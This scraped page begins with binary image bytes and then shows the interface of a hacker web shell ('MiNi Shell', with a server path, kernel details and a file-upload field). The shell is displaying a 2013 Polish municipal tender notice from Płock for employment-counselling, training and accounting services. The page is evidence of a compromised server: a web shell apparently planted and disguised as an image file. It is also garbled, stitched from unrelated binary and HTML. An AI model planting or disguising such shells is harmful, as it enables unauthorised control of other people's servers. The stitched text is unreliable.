JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130429/171596-N-2013.html

<p class="kh_header"><b>Płock: Świadczenie usługi z ramienia Partnera (MUP w Płocku) w projekcie pn.: Akademia Aktywizacji Zawodowej nr POKL.06.01.01-14-014/12, realizowanym w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VI, Działanie 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.1 Wsparcie osób pozostających bez zatrudnienia na regionalnym rynku pracy - ilość części 5.</b><br>
<b>Numer ogłoszenia: 171596 - 2013; data zamieszczenia: 29.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Urząd Pracy , ul. 3 Maja 16, 09-400 Płock, woj. mazowieckie, tel. 0-24 367 18 30, faks 0-24 367 18 31.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi z ramienia Partnera (MUP w Płocku) w projekcie pn.: Akademia Aktywizacji Zawodowej nr POKL.06.01.01-14-014/12, realizowanym w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VI, Działanie 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.1 Wsparcie osób pozostających bez zatrudnienia na regionalnym rynku pracy - ilość części 5..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Świadczenie usługi z ramienia Partnera (MUP w Płocku) w projekcie pn.: Akademia Aktywizacji Zawodowej nr POKL.06.01.01-14-014/12, realizowanym w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VI, Działanie 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.1 Wsparcie osób pozostających bez zatrudnienia na regionalnym rynku pracy - ilość części 5.
Część 1 - Doradca zawodowy.
Część 2 - Trener na warsztatach Wracam na rynek pracy.
Część 3 - Trener na warsztatach Rozwój usług społecznych.
Część 4 - Pracownik ds. nadzoru i wsparcia uczestników projektu.
Część 5 - Obsługa księgowa..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.00-2, 79.20.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część 1 - Doradca zawodowy.
Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą posiadającą łącznie:
a)	wykształcenie wyższe magisterskie, 
b)	studia podyplomowe z zakresu doradztwa zawodowego i pośrednictwa pracy,
c)	doświadczenie zawodowe w pracy z osobami bezrobotnymi,
d)	znajomość ustawy o promocji zatrudnienia i instytucjach rynku pracy oraz aktów normatywnych tej ustawy,
e)	co najmniej 4 letni staż pracy w Publicznych Służbach Zatrudnienia,
f)	ukończenie szkolenia z zakresu zasady równości szans kobiet i mężczyzn w realizacji projektów współfinansowanych z Unii Europejskiej,
g)	pełna zdolność do czynności prawnych oraz korzystanie z pełni praw publicznych, 
h)	niekaralność za umyślne przestępstwo ścigane z oskarżenia publicznego lub umyślne przestępstwo skarbowe.
Część 2 - Trener na warsztatach Wracam na rynek pracy.
Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą posiadającą łącznie:
a)	wykształcenie wyższe magisterskie,
b)	doświadczenie zawodowe w pracy z osobami bezrobotnymi,
c)	znajomość ustawy o promocji zatrudnienia i instytucjach rynku pracy oraz aktów normatywnych tej ustawy,
d)	co najmniej 3 letni staż pracy w Publicznych Służbach Zatrudnienia,
e)	znajomość problematyki lokalnego rynku pracy,
f)	ukończone szkolenie z zakresu coachingu w pracy doradcy zawodowego,
g)	ukończone szkolenie z zakresu poszukiwania pracy,
h)	ukończenie szkolenia z zakresu zasady równości szans kobiet i mężczyzn w realizacji projektów współfinansowanych z Unii Europejskiej
i)	pełna zdolność do czynności prawnych oraz korzystanie z pełni praw publicznych, 
j)	niekaralność za umyślne przestępstwo ścigane z oskarżenia publicznego lub umyślne przestępstwo skarbowe.
Część 3 - Trener na warsztatach Rozwój usług społecznych.
Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą posiadającą łącznie:
a)	wykształcenie wyższe magisterskie, kierunek: psychologia,
b)	studia podyplomowe z zakresu doradztwa zawodowego i pośrednictwa pracy,
c)	doświadczenie zawodowe w pracy z osobami bezrobotnymi,
d)	co najmniej 5 letni staż pracy w Publicznych Służbach Zatrudnienia,
e)	ukończenie szkolenia trenerskiego (min.180 godzin),
f)	doświadczenie w zakresie prowadzenia warsztatów grupowych,
g)	doświadczenie w realizacji projektów współfinansowanych z Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w zakresie udzielania porad dla osób bezrobotnych
h)	pełna zdolność do czynności prawnych oraz korzystanie z pełni praw publicznych, 
i)	niekaralność za umyślne przestępstwo ścigane z oskarżenia publicznego lub umyślne przestępstwo skarbowe.
Część 4 - Pracownik ds. nadzoru i wsparcia uczestników projektu.
Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą posiadającą łącznie:
a)	wykształcenie wyższe magisterskie, kierunek: politologia w zakresie nauk politycznych,
b)	co najmniej 4 letni staż pracy w Publicznych Służbach Zatrudnienia,
c)	doświadczenie w realizacji projektów współfinansowanych z Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
d)	pełna zdolność do czynności prawnych oraz korzystanie z pełni praw publicznych, 
e)	niekaralność za umyślne przestępstwo ścigane z oskarżenia publicznego lub umyślne przestępstwo skarbowe.
Część 5 - Obsługa księgowa.
Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą posiadającą łącznie:
a)	wykształcenie wyższe magisterskie, kierunek: ekonomia, 
b)	co najmniej półtoraroczne doświadczenie zawodowe w Publicznych Służbach Zatrudnienia,
c)	pełna zdolność do czynności prawnych oraz korzystanie z pełni praw publicznych, 
d)	niekaralność za umyślne przestępstwo ścigane z oskarżenia publicznego lub umyślne przestępstwo skarbowe.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz oferty - Załącznik Nr 1 do SIWZ.
2) Pełnomocnictwo (oryginał) osoby lub osób podpisujących ofertę -  jeżeli uprawnienie do podpisu nie wynika bezpośrednio  z załączonych dokumentów.
3) Oświadczenie osoby wskazanej do wykonania zamówienia - Załącznik Nr 4 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zgodnie z art. 144 ustawy PZP, Zamawiający dopuszcza zmiany umowy w zakresie: 
- przypadków losowych, które będą miały wpływ na treść zawartej umowy i termin realizacji,
- zmiany terminu realizacji projektu, w ramach którego umowa jest realizowana, co będzie miało wpływ na zmianę terminu obowiązywania niniejszej umowy
- zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy, zmiany będące następstwem działania organów administracji.
2. Wszelkie zmiany i uzupełnienia umowy wymagają akceptacji obu stron i formy pisemnego aneksu, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mup.bip.ump.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Urząd Pracy w Płocku ul. 3 Maja 16, 09-400 Płock - pok. 104.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.05.2013 godzina 10:00, miejsce: Miejski Urząd Pracy w Płocku ul. 3 Maja 16, 09-400 Płock - pok. 102 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn.: Akademia Aktywizacji Zawodowej nr POKL.06.01.01-14-014/12, realizowany w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VI, Działanie 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.1 Wsparcie osób pozostających bez zatrudnienia na regionalnym rynku pracy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Doradca zawodowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zadań Doradcy zawodowego:
1)	zapoznanie się z dokumentacją niezbędną przy realizacji projektu (projektową, organizacyjną, itp.),
2)	świadczenie pomocy uczestnikom projektu w wyborze odpowiedniego zawodu, informacji o zawodach, rynku pracy oraz uzyskaniu zatrudnienia,
3)	wypracowanie Indywidualnego Planu Działania podczas rozmowy doradczej (50 osób zarejestrowanych w MUP w Płocku),
4)	 pozyskiwanie informacji na temat potencjału uczestników projektu, ich sytuacji społeczno - zawodowej, potrzeb, aspiracji, możliwości rozwojowych, a także ukierunkowanie ich do wyboru odpowiedniego kierunku szkolenia,
5)	pomoc uczestnikom projektu w powrocie na otwarty rynek pracy, 
6)	prowadzenie dokumentacji w zakresie ww. działań, 
7)	współpraca z koordynatorem projektu pn.: Akademia Aktywizacji Zawodowej, 
z innymi pracownikami świadczącymi usługi w projekcie,
8)	prowadzenie spotkań między godziną 8.00 a 18.00 na podstawie harmonogramu wskazanego przez Zamawiającego, w miejscu wskazanym przez Zamawiającego,
9)	prowadzenie miesięcznych kart czasu pracy,
10)	przygotowywanie po zakończonym miesiącu protokołu odbioru wykonywanej pracy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Trener na warsztatach Wracam na rynek pracy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zadań Trenera na warsztatach Wracam na rynek pracy:
1)	zapoznanie się z dokumentacją niezbędną przy realizacji projektu (projektową, organizacyjną, itp.),
2)	pomoc w dokonaniu analizy posiadanych przez uczestników projektu umiejętności 
i predyspozycji do wykonywania określonej pracy,
3)	opracowanie z uczestnikami projektu strategii pokonywania barier w powrocie na rynek pracy                              i uzyskaniu zatrudnienia,
4)	diagnozowanie wewnętrznych i zewnętrznych barier oraz trudności w znalezieniu zatrudnienia przez uczestników projektu,
5)	pomoc w sporządzaniu dokumentów niezbędnych w poszukiwaniu pracy: życiorys zawodowy (CV)              i list motywacyjny,
6)	zwiększenie zdolności komunikacyjnych uczestników projektu z wykorzystaniem różnych metod m.in. testów, ćwiczeń itp,
7)	uświadomienie uczestnikom projektu roli inwestowania w rozwój swoich kwalifikacji, 
8)	prowadzenie dokumentacji w zakresie ww. działań, 
9)	współpraca z koordynatorem projektu pn.: Akademia Aktywizacji Zawodowej, z innymi pracownikami świadczącymi usługi w projekcie,
10)	 prowadzenie spotkań od poniedziałku do piątku, między godziną 8.00 a 18.00  na podstawie harmonogramu wskazanego przez Zamawiającego, w miejscu wskazanym przez Zamawiającego - Wykonawca zobowiązuje się do prowadzenia zajęć nie dłużej  niż 5 godzin dziennie,
11)	 prowadzenie miesięcznych kart czasu pracy,
12)	 przygotowywanie po zakończonym miesiącu protokołu odbioru wykonywanej pracy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Trener na warsztatach Rozwój usług społecznych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zadań Trenera na warsztatach Rozwój usług społecznych:
1)	zapoznanie się z dokumentacją niezbędną przy realizacji projektu (projektową, organizacyjną, itp.),
2)	udzielenie pomocy uczestnikom projektu w odbudowywaniu i podtrzymywaniu umiejętności uczestnictwa w życiu społeczności lokalnej, w powrocie do pełnienia ról społecznych,
3)	 udzielenie pomocy w przezwyciężaniu barier w integracji społecznej, radzeniu sobie 
z emocjami oraz konfliktami wynikającymi m.in. z pracy zespołowej z wykorzystaniem różnych metod m.in. testów, ćwiczeń itp,,
4)	podnoszenie wiedzy i umiejętności w zakresie radzenia sobie z codziennymi problemami,
5)	prowadzenie dokumentacji w zakresie ww. działań, 
6)	współpraca z koordynatorem projektu pn.: Akademia Aktywizacji Zawodowej, z innymi pracownikami świadczącymi usługi w projekcie,
7)	prowadzenie spotkań od poniedziałku do piątku, między godziną 8.00 a 18.00 na podstawie harmonogramu wskazanego przez Zamawiającego, w miejscu wskazanym przez Zamawiającego - Wykonawca zobowiązuje się do prowadzenia zajęć nie dłużej niż 5 godzin dziennie,
8)	prowadzenie miesięcznych kart czasu pracy,
9)	przygotowywanie po zakończonym miesiącu protokołu odbioru wykonywanej pracy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pracownik ds. nadzoru i wsparcia uczestników projektu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zadań Pracownika ds. nadzoru i wsparcia uczestników projektu:
1)	zapoznanie się z dokumentacją niezbędną przy realizacji projektu (projektową, organizacyjną, itp.),
2)	opieka nad grupą 50 osób (udzielanie porad i wsparcia w sytuacjach trudnych 
lub kryzysowych mających miejsce podczas realizacji projektu, bezpośrednie przekazywanie informacji uczestnikom projektu związanych ze sprawami organizacyjnymi),
3)	udział przy rekrutacji uczestników projektu sporządzanie i gromadzenie dokumentacji dot. procesu rekrutacyjnego,
4)	nadzór nad sprawami organizacyjnymi związanymi z uczestnikami projektu,  w tym czuwanie nad obecnością uczestników podczas szkoleń, warsztatów, Indywidualnych Planów Działania i innych spotkań przewidzianych w ramach projektu,
5)	niezwłoczne informowanie koordynatora projektu o nieusprawiedliwionej nieobecności uczestników projektu podczas szkoleń i warsztatów,
6)	rozliczanie kosztów dojazdu na szkolenia,
7)	organizacja stażu w ramach projektu (nabór wniosków, wybór pracodawców pod kątem umiejętności i kompetencji uczestników, weryfikacja umów dot. organizacji stażu,
8)	kontrola prawidłowego naliczenia stypendium stażowego oraz refundacji kosztów dojazdu, utrzymywanie bieżącego kontaktu z organizatorami stażu, badanie efektywności),
9)	nadzorowanie statusów uczestników projektu w ewidencji osób bezrobotnych,
10)	współpraca z organizatorem szkoleń w zakresie kontrolowania uczestników projektu,
11)	współpraca z koordynatorem projektu pn.: Akademia Aktywizacji Zawodowej oraz osobami świadczącymi usługi w projekcie,
12)	 prowadzenie miesięcznych kart czasu pracy,
13)	przygotowywanie po zakończonym miesiącu protokołu odbioru wykonywanej pracy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Obsługa księgowa..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zadań Obsługi księgowej:
1.	zapoznanie z dokumentacją niezbędną do realizacji projektu (organizacyjną, projektową),
2.	stworzenie wyodrębnionej ewidencji księgowej dotyczącej realizacji projektu zgodnie 
z zasadą przejrzystości wynikającą z ustawy o rachunkowości,
3.	rozliczanie otrzymanych od Lidera środków finansowych na zasadach określonych 
w umowie partnerskiej,
4.	przegotowanie niezbędnych dokumentów potwierdzających poniesienie wydatków do dekretowania              i księgowania,
5.	bieżące składanie do Lidera informacji o wszystkich uczestnikach zadań realizowanych przez Partnera,
6.	przygotowywanie dla Lidera dokumentów finansowych niezbędnych do rozliczenia.
7.	monitorowanie, dekretowanie i sprawdzanie pod względem formalnym i rachunkowym dokumentów potwierdzających wydatki ponoszone w ramach przydzielonych zadań,
8.	monitorowanie zmian w wytycznych w zakresie sprawozdawczości i rozliczania projektów współfinansowanych ze środków UE,
9.	opisywanie dokumentacji zgodnie z wytycznymi Instytucji Wdrażającej,
10.	przygotowywanie harmonogramów zakupów,
11.	nadzór nad prawidłowością składanych do Lidera dokumentów finansowych (zestawień poniesionych wydatków) w terminach określonych umową partnerską,
12.	monitorowanie wykonania budżetu projektu w części przypadającej na Partnera,
13.	przygotowywanie dokumentacji niezbędnej:
- do naliczenia wynagrodzeń pracowników zatrudnionych przy realizacji projektu,
- do sporządzenia listy płac,
- do sporządzenia deklaracji ZUS i deklaracji podatkowych.
14.	terminowe przygotowywanie dokumentacji do dokonywania przelewów i rozliczania środków pieniężnych na wyodrębnionym rachunku bankowym,
15.	monitorowanie wykonania harmonogramu rzeczowo-finansowego budżetu w części przypadającej na Partnera,
16.	przygotowywanie wniosków o płatność i przekazywanie ich do Lidera,
17.	bieżąca współpraca z Księgową projektu od strony Lidera w zakresie rozliczania finansowego projektu w części przypadającej na Partnera,
18.	wykonywanie innych zadań związanych z realizacją projektu, zleconych przez Kierownika projektu,
19.	udział w spotkaniach zespołu projektowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.20.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com